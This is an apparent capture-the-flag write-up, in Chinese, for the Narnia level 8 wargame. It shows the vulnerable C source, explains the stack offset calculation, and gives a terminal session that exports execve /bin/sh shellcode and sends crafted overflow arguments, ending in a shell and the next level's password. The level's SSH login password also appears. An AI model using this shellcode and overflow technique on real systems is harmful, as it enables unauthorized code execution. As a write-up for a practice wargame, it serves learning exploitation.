/** narnia8.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;
void func(char *b){
char *blah=b;
char bok[20];
//int i=0;
memset(bok, '\0', sizeof(bok));
for(i=0; blah[i] != '\0'; i++)
bok[i]=blah[i];
printf("%s\n",bok);
}
int main(int argc, char **argv){
if(argc > 1)
func(argv[1]);
else
printf("%s argument\n", argv[0]);
return 0;
}
/** nar.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;
void func(char *b){
char *blah=b;
char bok[20];
//int i=0;
printf("%p\n", blah);
memset(bok, '\0', sizeof(bok));
for(i=0; blah[i] != '\0'; i++)
bok[i]=blah[i];
printf("%s\n",bok);
}
int main(int argc, char **argv){
if(argc > 1)
func(argv[1]);
else
printf("%s argument\n", argv[0]);
return 0;
}
棧環境
blah存儲着一個指針, 指針指向argv[1], 這個argv參數是在main函數之前壓棧的, 所以下面我們計算這個地址時, 不需要處理對齊的情況
這個argv1 字符串參數 必須把func結束後eip地址替換掉, 既圖的最上面的eip的值
那麼從bok開始我們要覆蓋的數據是 20B + 4B + 12B + 4B
前一個4B是blah本來的值, 後一個4B是 存儲shellcode的環境變量EGG的值
通過運行 narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��
可以推算出 /narnia/narnia8 的blah的值爲0xffffd7b4 - 0x14 = 0xffffd7a0
這裏計算偏移和narnia4不同 narnia4的偏移爲0x10 是因爲計算的是buffer的地址, 這個地址是main函數中16字節對齊之後的結果
而此處的偏移爲0x14 既 strlen("/narnia/narnia8") * 2 - strlen("./nar") * 2 是因爲我要得到的值是argv[1]的地址, 這個地址是在main函數之前壓棧的
這時候還沒有經過main函數的16字節對齊處理, 所以相差20個字節
如果是對齊的情況, 就是相差 16個字節 (15 * 2 對齊到 32) (5 * 2 對齊到 16) 32 - 16 = 16
root@today:~# ssh [email protected]
[email protected]'s password: mohthuphog
narnia8@melinda:~$ cd /tmp/shadowcoder8
narnia8@melinda:/tmp/shadowcoder8$ ls
env env.c nar nar.c narnia8 narnia8.c sleep.sh
narnia8@melinda:/tmp/shadowcoder8$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')
narnia8@melinda:/tmp/shadowcoder8$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��
narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xb4\xd7\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault
narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "abcd"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault
narnia8@melinda:/tmp/shadowcoder8$ gcc env.c -o env -m32
narnia8@melinda:/tmp/shadowcoder8$ ./env EGG /narnia/narnia8
0xffffd8a3
narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "\xa3\xd8\xff\xff"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUU��������
$ whoami
narnia9
$ cat /etc/narnia_pass/narnia9
eiL5fealae
$